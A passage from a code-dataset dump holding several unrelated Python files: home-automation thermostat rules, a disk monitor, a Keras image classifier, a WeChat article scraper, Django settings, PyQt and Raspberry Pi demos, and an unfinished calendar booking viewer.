oh_item.getName():\r\n new_mode = state_machine.state_map[str(\r\n int(float(str(item_state))))]\r\n initialize_thermostate_statemachines.log.info(\r\n \"handling SetPointMode: \" + oh_item.getName() + \"(\" + new_mode + \")\")\r\n state_machine.set_mode(new_mode)\r\n state_machine.send(\"tr_mode_change\")\r\n if \"WindowState\" in oh_item.getName():\r\n initialize_thermostate_statemachines.log.info(\r\n \"handling WindowState: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n state_machine.set_boost(oh_item.getState() == \"ON\")\r\n state_machine.send(\"tr_window_change\")\r\n\r\n for therm_sm in get_state_machine_list().values():\r\n initialize_thermostate_statemachines.log.info(\r\n \"StateMachine \" + therm_sm.get_name() + \"(\" + str(id(therm_sm)) +\r\n \"): is in state \" + therm_sm.get_state_name())\r\n initialize_thermostate_statemachines.log.debug(\r\n get_internal_state_machine_state(therm_sm)\r\n )\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n initialize_thermostate_statemachines.log.info(\"Done\")\r\n\r\n# ####################\r\n# Rules\r\n# ####################\r\n\r\n# Check BoostModes\r\n\r\n\r\n@rule(\"Thermostat_BoostMode_check\",\r\n description=\"react on changes in BoostMode\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"boostmode\"])\r\n@when(\"Member of gThermostate_BoostMode changed\")\r\ndef thermostate_boost_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if BoostMode changes\r\n Args:\r\n event (_type_): any BoostMode item\r\n \"\"\"\r\n thermostate_boost_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(\r\n event.itemName, thermostate_boost_mode_changes.log)\r\n therm_sm.set_boost(str(event.itemState) == \"ON\")\r\n therm_sm.send(\"tr_boost_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check ConfigModes\r\n\r\n\r\n@rule(\"Thermostat_ConfigMode_check\",\r\n description=\"react on changes in ConfigMode\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"configmode\"])\r\n@when(\"Member of gThermostate_ConfigsPending changed\")\r\ndef thermostate_config_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if ConfigMode changes\r\n Args:\r\n event (_type_): any ConfigMode item\r\n \"\"\"\r\n thermostate_config_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(\r\n event.itemName, thermostate_config_mode_changes.log)\r\n therm_sm.set_config(str(event.itemState) == \"ON\")\r\n therm_sm.send(\"tr_config_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check Modes\r\n\r\n\r\n@rule(\"Thermostat_Mode_check\",\r\n description=\"react on changes in Mode\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"mode\"])\r\n@when(\"Member of gThermostate_SetPointModes changed\")\r\ndef thermostate_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if Mode changes\r\n Args:\r\n event (_type_): any Mode item\r\n \"\"\"\r\n thermostate_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(event.itemName, thermostate_mode_changes.log)\r\n thermostate_mode_changes.log.info(therm_sm.get_name())\r\n if str(event.itemState) in therm_sm.state_map:\r\n therm_sm.set_mode(therm_sm.state_map[str(event.itemState)])\r\n else:\r\n thermostate_mode_changes.log.info(\r\n \"unknown mode %s value for %s\", event.itemState, event.itemName)\r\n therm_sm.send(\"tr_mode_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check PartyModes\r\n\r\n\r\n@rule(\"Thermostat_PartyMode_check\",\r\n description=\"react on changes in PartyMode\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"partymode\"])\r\n@when(\"Member of gThermostate_PartyModes changed\")\r\ndef thermostate_party_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if PartyMode changes\r\n Args:\r\n event (_type_): any PartyMode item\r\n \"\"\"\r\n thermostate_party_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(\r\n event.itemName, thermostate_party_mode_changes.log)\r\n therm_sm.set_party(str(event.itemState) == \"ON\")\r\n therm_sm.send(\"tr_party_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check WindowStates\r\n\r\n\r\n@rule(\"Thermostat_WindowState_check\",\r\n description=\"react on changes in WindowState\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"windowmode\"])\r\n@when(\"Member of gThermostate_WindowStates changed\")\r\ndef thermostate_window_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if WindowState changes\r\n Args:\r\n event (_type_): any WindowState item\r\n \"\"\"\r\n thermostate_window_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(\r\n event.itemName, thermostate_window_mode_changes.log)\r\n therm_sm.set_window_open(str(event.itemState) == \"ON\")\r\n therm_sm.send(\"tr_window_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n","sub_path":"automation/jsr223/python/personal/thermostat_mode.py","file_name":"thermostat_mode.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"605381365","text":"# -*- coding: UTF-8 -*-\n\nfrom lib import main, datalib, maillib, shellbin\n\ndef worker( topic, debug=False ):\n cmd = \"%s -a -k -i -T|%s '{if(NR != 1)print $6,$9,$10}'\" % \\\n ( shellbin.df, shellbin.awk )\n nowTime = main.getTime().now()\n status, output = main.execCmd( cmd )\n if status != 0:\n level = 'ERROR'\n maillib.mailer( msg + '\\n' + output )\n datalib.logger( topic, msg, level, debug )\n \n data = {\n nowTime : {},\n }\n d = data[nowTime]\n output = output.split('\\n')\n for i in output:\n i = i.split()\n if i[-1] == '/dev':\n continue\n d['%s(used)'%i[-1]] = i[0]\n d['%s(inode)'%i[-1]] = i[1]\n\n datalib.dataWriter( topic, data )\n","sub_path":"script/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"148348961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 22 09:32:50 2020\n\n@author: Miyazaki\n\"\"\"\n\nfrom skimage import data, color, feature\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom tkinter import filedialog\nimport tkinter \nfrom tkinter import messagebox\nimport sys, os, os.path\nfrom tqdm import tqdm\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array, load_img\nimport numpy\nfrom PIL import Image\nimport matplotlib.patches as pat\nimport time \n\ndef rgb_to_gray(src):\n # obtain individual values\n b, g, r = src[:,:,0], src[:,:,1], src[:,:,2]\n # RGB to gray\n return np.array(0.2989 * r + 0.5870 * g + 0.1140 * b, dtype='float32')\n#################################################\n\n\n#file dialogue\nroot = tkinter.Tk()\nroot.withdraw()\ndir = \"C:/Users/miyas\"\nmessagebox.showinfo('selectfiles', 'select a image')\ntarget_file_path = tkinter.filedialog.askopenfilename(initialdir = dir)\n#messagebox.showinfo('selectfiles', 'select your trained model')\nmodel_file_path = \"C:/Users/Miyazaki/Desktop/private/Deeplearning/models/20200515/test1_model3.h5\"\nmodel=load_model(model_file_path)\n#init setting \nwindow_width = 50\nwindow_height = 50\nfolderpath = os.path.dirname(target_file_path)\nfilelist = os.listdir(folderpath)\nfilelist = [i for i in filelist if os.path.splitext(i)[1] == '.jpg' \\\n or os.path.splitext(i)[1] == '.png']\nos.chdir(folderpath)\nos.makedirs(\"../{}\".format('label1'), exist_ok = True)\nos.makedirs(\"../{}\".format('label0'), exist_ok = True)\n#file load \n\nt1 = time.time() \n\n\n#以下でスケール変換機能はひとまず凍結\ndef sliding_window(img, patch_size =[100, 100], istep =25, jstep=25, scale =1.0):\n Ni, Nj=[int(scale*s) for s in patch_size]\n #リスト内包表記でスケール変換\n for i in range(0, img.shape[0] - Ni, istep):\n #ここではスライディングウィンドウを横に何個設けるか計算してiに代入\n for j in range(0, img.shape[1]- Ni, jstep):\n #同じく縦にいくつか\n patch = img[i:i + Ni, j:j+Nj]\n #一つのパッチ\n #if scale != 1:\n #patch = transform.resize(patch, patch_size)\n PILpatch = Image.fromarray(numpy.uint8(patch))\n yield (i, j), PILpatch, patch\n \nfor k in filelist:\n test_image = cv2.imread(k)\n indices, patches, cv2_patches = zip(*sliding_window(test_image))\n labels = []\n for i in range(len(tqdm(patches))):\n img_nad = img_to_array(patches[i])/255\n #transform to 4D\n img_nad = img_nad[None, ...]\n pred = model.predict(img_nad)\n label = model.predict_classes(img_nad)\n label = int(label[0][0])\n if label ==1:\n cv2.imwrite('./label1/positive{}.jpg'.format(i),cv2_patches[i])\n else:\n cv2.imwrite('./label0/positive{}.jpg'.format(i),cv2_patches[i])\n labels.append(label)\n labels = np.array(labels)\n\n\nt2 = time.time()\nelapsed_time = t2-t1\nprint(f\"経過時間:{elapsed_time}\")\n\n","sub_path":"Image_analysis/Background_Subtraction/keras_worm_detector_for_mining.py","file_name":"keras_worm_detector_for_mining.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"15677161","text":"# http://chuansong.me/\n# 从传送门获取微信公众号数据\n\nimport pymysql\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom webspider import wechat_article_content_spider\n\n# http://chuansong.me/account/cdfer100?start=0\nbase_url = \"http://chuansong.me\"\npublic_id = \"cdsb86612222\" # 需要爬取的微信公众号\npublic_name = '成都商报'\nhome_url = base_url + \"/account/\" + public_id\n\n\nclass FuckWechat:\n # 构造基本的request\n def request(self, url, proxy_ip):\n proxy = {\n 'http': 'http://%s' % (proxy_ip.strip()) ##设置随机代理ip\n }\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\"}\n\n try:\n content = requests.get(url, headers=headers, proxies=proxy, timeout=10)\n if content.status_code == 200:\n return content\n else:\n wechat_article_content_spider.GetDetail.write_ip_file()\n self.parse_page(url, wechat_article_content_spider.GetDetail.read_ip_file())\n except requests.exceptions.ConnectionError:\n wechat_article_content_spider.GetDetail.write_ip_file()\n self.parse_page(url, wechat_article_content_spider.GetDetail.read_ip_file())\n except requests.exceptions.ReadTimeout:\n wechat_article_content_spider.GetDetail.write_ip_file()\n self.parse_page(url, wechat_article_content_spider.GetDetail.read_ip_file())\n\n def get_max_page(self, url, proxy_ip):\n html = self.request(url, proxy_ip)\n soup = BeautifulSoup(html.text, 'html.parser')\n last_page_index = soup.find_all('a')[-6].get_text() # 获取最后一页的页码\n if str(last_page_index).isdigit():\n print(last_page_index)\n return int(last_page_index)\n else:\n print('没有获取到页码')\n\n def parse_page(self, url, proxy_ip):\n html = self.request(url, proxy_ip)\n if html is not None:\n soup = BeautifulSoup(html.text, 'html.parser')\n div_items = soup.find_all('div', class_='feed_item_question')\n list = []\n for div_item in div_items:\n article_title = div_item.find('a').get_text()\n article_detail_link = base_url + div_item.find('a')['href']\n publish_time = div_item.find('span', class_='timestamp').get_text()\n data = (public_id, public_name, article_title.replace(\"\\n\", \"\"), article_detail_link, publish_time)\n list.append(data)\n # print(list)\n self.insert_db(list)\n\n def insert_db(self, data):\n db = pymysql.connect(host='localhost', port=3306, user='root', passwd='', charset='utf8mb4',\n db='wechat_article_data')\n cursor = db.cursor()\n sql = \"INSERT INTO wechat_chuansong_data(public_id,public_name,article_title,article_detail_link,publish_time) VALUES(%s,%s,%s,%s,%s)\"\n try:\n cursor.executemany(sql, data)\n db.commit()\n print('---插入成功---' + str(cursor.lastrowid))\n except ValueError as e:\n db.rollback()\n print(e)\n finally:\n cursor.close()\n db.close()\n\n def run(self):\n max = self.get_max_page(home_url, wechat_article_content_spider.GetDetail.read_ip_file())\n for page_num in range(max):\n proxy_id = wechat_article_content_spider.GetDetail.read_ip_file()\n self.parse_page(home_url + \"?start=\" + str(page_num * 12), proxy_id)\n\n\nFuckWechat = FuckWechat()\nFuckWechat.run()\n","sub_path":"webspider/wechat_web_spider.py","file_name":"wechat_web_spider.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"614507609","text":"import time\nimport os\nimport RPi.GPIO as io\nio.setmode(io.BCM)\n\npir_pin = 18\n#door_pin = 23\nled_pin = 4\nio.setup(pir_pin, io.IN) # activate input\n#io.setup(door_pin, io.IN, pull_up_down=io.PUD_UP) # activate input with PullUp\n\nio.setup(led_pin, io.OUT) \nloopcount = 0\nio.output(led_pin, True)\n\n#while True:\n# if io.input(pir_pin):\n# print(\"PIR ALARM!\")\n#\tio.output(led_pin, True)\n#\tos.system(\"date > /home/pi/motion.log\")\n#\tloopcount = 0 \n# else: \n#\tloopcount = loopcount + 1 \n# io.output(led_pin, False)\n# #if io.input(door_pin):\n# # print(\"DOOR ALARM!\")\n# time.sleep(0.5)\n# if loopcount == 30:\n#\tprint(\"30 sec of slence\")\n","sub_path":"ledon.py","file_name":"ledon.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"469633080","text":"import unittest\nfrom expression import Expression\n\nclass TestPolynomial(unittest.TestCase):\n\tdef test_wrong_input(self):\n\t\texpression = \"6*x*x*x\"\n\t\texc = None\n\t\ttry:\n\t\t\tres = Expression(expression)\n\t\texcept ValueError as error:\n\t\t\texc = error\n\t\tself.assertIsNotNone(exc)\n\n\tdef test_not_string_is_given(self):\n\t\texpression = []\n\t\texc = None\n\t\ttry:\n\t\t\tres = Expression(expression)\n\t\texcept AssertionError as error:\n\t\t\texc = error\n\t\tself.assertIsNotNone(exc)\n\n\tdef test_calculation_when_we_do_not_have_x(self):\n\t\tex = \"62\"\n\t\texpression = Expression(ex)\n\t\texpected = \"0\"\n\t\tself.assertEqual(expected,expression.result)\n\n\tdef test_calculation_when_we_have_no_coef(self):\n\t\texpression1 = Expression(\"x^6\")\n\t\texpression2 = Expression(\"x\")\n\t\tself.assertEqual(expression1.result,\"6*x^5\")\n\t\tself.assertEqual(expression2.result,\"1\")\n\n\tdef test_calculation_when_we_have_coef(self):\n\t\texpression1 = Expression(\"6*x\")\n\t\texpression2 = Expression(\"7*x^2\")\n\t\texpression3 = Expression(\"2*x^0\")\n\t\tself.assertEqual(expression1.result,\"6\")\n\t\tself.assertEqual(expression2.result,\"14*x\")\n\t\tself.assertEqual(expression3.result,\"0\")\n\n\tdef test_with_no_degree(self):\n\t\texpression1 = Expression(\"x\")\n\t\texpression2 = Expression(\"3*x\")\n\t\texpression3 = Expression(\"3x\")\n\t\tself.assertEqual(expression3.result,\"3\")\n\t\tself.assertEqual(expression2.result,\"3\")\n\t\tself.assertEqual(expression1.result,\"1\")\n\n\t\t\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"polynomial/test_expression.py","file_name":"test_expression.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"407275830","text":"#! /usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom django.conf.urls import url\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n url(r'^services/$', views.services_page, name='services_page'),\r\n url(r'^price/$', views.price_page, name='price_page'),\r\n url(r'^about/$', views.about_page, name='about_page'),\r\n url(r'^contacts/$', views.contacts_page, name='contacts_page'),\r\n url(r'^', views.mainpage, name='main_page'),\r\n]","sub_path":"baseApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"429862063","text":"import os\n\n\ntry:\n import dpctl\n\n dppy_present = dpctl.has_sycl_platforms() and dpctl.has_gpu_queues()\nexcept:\n dppy_present = False\n\n\ndef _readenv(name, ctor, default):\n \"\"\"Original version from numba\\core\\config.py\n class _EnvReloader():\n ...\n def process_environ():\n def _readenv(): ...\n \"\"\"\n value = os.environ.get(name)\n if value is None:\n return default() if callable(default) else default\n try:\n return ctor(value)\n except Exception:\n warnings.warn(\n \"environ %s defined but failed to parse '%s'\" % (name, value),\n RuntimeWarning,\n )\n return default\n\n\n# Save intermediate files being generated by DPPY\nSAVE_IR_FILES = _readenv(\"NUMBA_DPPY_SAVE_IR_FILES\", int, 0)\n\n# Turn SPIRV-VALIDATION ON/OFF switch\nSPIRV_VAL = _readenv(\"NUMBA_DPPY_SPIRV_VAL\", int, 0)\n","sub_path":"numba-dppy/numba_dppy/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"165817891","text":"#Menubar\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QAction, QMenu\nfrom PyQt5.QtCore import QCoreApplication\n\nclass Exam(QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.statusBar()#create statusbar\n self.statusBar().showMessage(\"something\")#take instance an showmessage\n\n menu = self.menuBar()#create menubar\n menu_file = menu.addMenu('File')#adding menu, creating group\n menu_edit = menu.addMenu('Edit')\n\n file_exit = QAction('Exit', self) #create instance\n file_exit.setShortcut('Ctrl+Q') #setting hot key\n file_exit.setStatusTip(\"something to quit\")#view Tips\n\n file_exit.triggered.connect(QCoreApplication.instance().quit)#When it's selected\n\n file_new = QMenu('New', self)#make subgroup\n\n new_txt = QAction('text file', self)#make sub menu\n new_py = QAction('python file', self)\n\n file_new.addAction(new_py)#add sub menu\n file_new.addAction(new_txt)\n\n menu_file.addAction(file_exit)\n menu_file.addMenu(file_new)#creat Menu group\n self.resize(450,400)\n self.show()\n\napp = QApplication(sys.argv)\nw = Exam()\nsys.exit(app.exec_())","sub_path":"SeeWhy/test/test_gui_Menubar.py","file_name":"test_gui_Menubar.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"612013132","text":"\"\"\"\nDjango shared settings for the shortimer project.\n\nYou must set a SECRET_KEY environment variable. You will probably want to set\nat least some of the environment variables referenced under Social auth and\nMisc credentials. You probably do not need to override anything else. If you\ndo, you should override that in your personal settings file in\n`settings/dev/yourfile.py` and make sure that your DJANGO_SETTINGS_MODULE\npoints to that file.\n\"\"\"\n\nimport os\n\nfrom django.core.exceptions import ImproperlyConfigured\n\n# Build paths inside the project like this: os.path.join(PROJECT_DIR, ...)\nSETTINGS_DIR = os.path.dirname(os.path.abspath(__file__))\nPROJECT_DIR = os.path.join(SETTINGS_DIR, '..')\nLOG_DIR = os.path.join(PROJECT_DIR, \"logs\")\n\ndef get_env_requirement(var_name):\n \"\"\"\n Get the environment variable or return exception. Use this for variables\n that are required for the project to run.\n \"\"\"\n try:\n return os.environ[var_name]\n except KeyError:\n error_msg = \"Could not find the environment variable %s\" % var_name\n raise ImproperlyConfigured(error_msg)\n\ndef get_env_variable(var_name):\n \"\"\"\n Get the environment variable or don't. Use only for optional settings.\n \"\"\"\n try:\n return os.environ[var_name]\n except KeyError:\n return None\n\n\n###############################################################################\n#\n# Misc yaks\n#\n###############################################################################\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\n# This is insecure and should be overridden in production.py and other servers.\nALLOWED_HOSTS = [\"*\"]\n\nSITE_ID = 1\n\nSECRET_KEY = get_env_requirement('SECRET_KEY')\n\nUSE_THOUSAND_SEPARATOR = True\n\nJOB_FEEDS = [\n 'http://joblist.ala.org/news/',\n 'http://archivesgig.wordpress.com/feed/',\n 'http://feeds.feedburner.com/alljobs',\n 'http://digital-scholarship.org/digitalkoans/category/digital-library-jobs/feed/',\n 'http://www.higheredjobs.com/rss/categoryFeed.cfm?catID=34',\n 'http://www.museumsandtheweb.com/jobs-available-and-wanted/feed/'\n 'http://jobs.educause.edu/jobs?keywords=library&resultsPerPage=12&noStem=false&titlesOnly=false&salary_open=false&showMoreOptions=false&display=rss',\n 'http://careers.archivists.org/jobs?resultsPerPage=12&display=rss'\n 'http://www.libraryjobline.org/rss',\n 'http://pipes.yahoo.com/arljobstorss/c8f6fa1c3aa9c60d39bc01a35e899fa5?_render=rss'\n]\n\nCRISPY_TEMPLATE_PACK = 'bootstrap'\n\n\n###############################################################################\n#\n# Application definition\n#\n###############################################################################\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'django.contrib.sitemaps',\n 'django.contrib.humanize',\n 'social_auth',\n 'south',\n 'crispy_forms',\n 'shortimer.jobs',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'pagination.middleware.PaginationMiddleware',\n)\n\nROOT_URLCONF = 'shortimer.urls'\n\n#this might need to be set\n#WSGI_APPLICATION = 'librarycloud.wsgi.application'\n\n\n###############################################################################\n#\n# Databases\n#\n###############################################################################\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(PROJECT_DIR, 'jobs.db'),\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n\n###############################################################################\n#\n# Internationalization\n#\n###############################################################################\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/Chicago'\nUSE_I18N = True\nUSE_L10N = False\nDATETIME_FORMAT = 'Y-m-d H:i:s T'\n\n# This was unset in a prior version of shortimer. That version of Django\n# defaulted USE_TZ to False; we're setting it here because explicit is\n# better than implicit.\nUSE_TZ = False\n\n\n###############################################################################\n#\n# Static files\n#\n###############################################################################\n\nSTATIC_ROOT = 'staticfiles'\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_DIR, 'static/'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nMEDIA_ROOT = ''\n\nMEDIA_URL = '/media/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n\n###############################################################################\n#\n# Templates\n#\n###############################################################################\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_DIR, 'templates'),\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.request',\n 'django.core.context_processors.static',\n)\n\n\n###############################################################################\n#\n# Authentication\n#\n###############################################################################\n\nAUTHENTICATION_BACKENDS = (\n 'social_auth.backends.twitter.TwitterBackend',\n 'social_auth.backends.facebook.FacebookBackend',\n 'social_auth.backends.contrib.linkedin.LinkedinBackend',\n 'social_auth.backends.contrib.github.GithubBackend',\n)\n\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/'\nLOGIN_ERROR_URL = '/login-error/'\n\n\n###############################################################################\n#\n# Logging\n#\n###############################################################################\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'pop': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'formatter': 'simple',\n 'filename': os.path.join(LOG_DIR, 'pop.log')\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'shortimer.jobs.management.commands.pop': {\n 'handlers': ['pop'],\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n}\n\n\n###############################################################################\n#\n# Social auth\n#\n###############################################################################\n\nTWITTER_CONSUMER_KEY = get_env_variable('TWITTER_CONSUMER_KEY')\nTWITTER_CONSUMER_SECRET = get_env_variable('TWITTER_CONSUMER_SECRET')\nTWITTER_EXTRA_DATA = [('profile_image_url', 'profile_image_url')]\n\nFACEBOOK_APP_ID = get_env_variable('FACEBOOK_APP_ID')\nFACEBOOK_API_SECRET = get_env_variable('FACEBOOK_API_SECRET')\n\nLINKEDIN_CONSUMER_KEY = get_env_variable('LINKEDIN_CONSUMER_KEY')\nLINKEDIN_CONSUMER_SECRET = get_env_variable('LINKEDIN_CONSUMER_SECRET')\n\nGITHUB_APP_ID = get_env_variable('GITHUB_APP_ID')\nGITHUB_API_SECRET = get_env_variable('GITHUB_API_SECRET')\n\nGOOGLE_CONSUMER_KEY = get_env_variable('GOOGLE_CONSUMER_KEY')\nGOOGLE_CONSUMER_SECRET = get_env_variable('GOOGLE_CONSUMER_SECRET')\nGOOGLE_DISPLAY_NAME = get_env_variable('GOOGLE_DISPLAY_NAME')\nGOOGLE_API_KEY = get_env_requirement('GOOGLE_API_KEY') # for freebase suggest\n\n\n###############################################################################\n#\n# Misc credentials\n#\n###############################################################################\n\n# Protip: don't recycle these passwords.\n\n# Credentials for the code4lib twitter account, to tweet new job postings.\n\nCODE4LIB_TWITTER_OAUTH_CONSUMER_KEY = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_CONSUMER_KEY')\nCODE4LIB_TWITTER_OAUTH_CONSUMER_SECRET = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_CONSUMER_SECRET')\nCODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_KEY = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_KEY')\nCODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_SECRET = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_SECRET')\n\n# bit.ly credentials for shortening job urls.\n\nBITLY_USERNAME = get_env_variable('BITLY_USERNAME')\nBITLY_PASSWORD = get_env_variable('BITLY_PASSWORD')\n\nGA_USERNAME = get_env_variable('GA_USERNAME')\nGA_PASSWORD = get_env_variable('GA_PASSWORD')\nGA_PROFILE_ID = get_env_variable('GA_PROFILE_ID')\n\n# Email account to pop for new job emails, and sending out new emails.\n\nEMAIL_HOST = 'pop.gmail.com'\nEMAIL_PORT = 587\nEMAIL_POP_PORT = 995\nEMAIL_HOST_USER = 'jobs4lib@gmail.com'\nEMAIL_HOST_PASSWORD = get_env_variable('EMAIL_HOST_PASSWORD')\nEMAIL_USE_TLS = True\nEMAIL_ANNOUNCE = ['you@example.com', 'me@example.com']\n\n###############################################################################\n#\n# Nose settings\n#\n###############################################################################\n\nINSTALLED_APPS += ('django_nose',) # must come after south\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nNOSE_ARGS = [\n '--with-coverage',\n '--cover-package=jobs',\n '--nocapture',\n '--nologcapture',\n '--logging-format=%(module)s %(levelname)s %(lineno)s: %(message)s',\n ]\n\n\n","sub_path":"settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"354527355","text":"import datetime\nfrom datetime import timedelta\nfrom datetime import datetime as dt\nimport colours\n\nn=0\n\ndef view_booking(service, email):\n global n\n '''\n Patient will be able to view all their bookings\n PARAMS : the service instance\n '''\n now = datetime.datetime.utcnow()\n now = now.isoformat() + 'Z'\n page_token = None\n while True:\n events = service.events().list(calendarId='primary',\n timeMin=now,pageToken=page_token).execute()\n\n\n for event in events['items']:\n try:\n # Dictionary Unpacking with variables\n summary = event['summary']\n summary = colours.colour(summary,\"green\")\n event_creator = event['creator']\n creator = event['attendees'][0]['email']\n creator = colours.colour(creator,\"yellow\")\n id_user = event['id']\n id_user = colours.colour(id_user,\"cyan\")\n\n #code for making a suitable time output\n start = event['start'].get('dateTime')\n start = start.split('T')\n date = start[0]\n time = start[1].split('+')\n time = time[0]\n time = dt.strptime(time, '%H:%M:%S')\n end_t = time + timedelta(minutes=30)\n time, end_t = str(time), str(end_t)\n time, end_t = time.split(\" \"), end_t.split(\" \")\n time, end_t = time[1], end_t[1]\n\n #Output of the Date\n if len(event['attendees']) == 2:\n patient_email = event['attendees'][1][\"email\"]\n if patient_email == email:\n n+=1\n print(summary.strip(), 'by', event['attendees'][0]['email'],\"\\n\", date, '', time\n ,'-',end_t,'\\n', 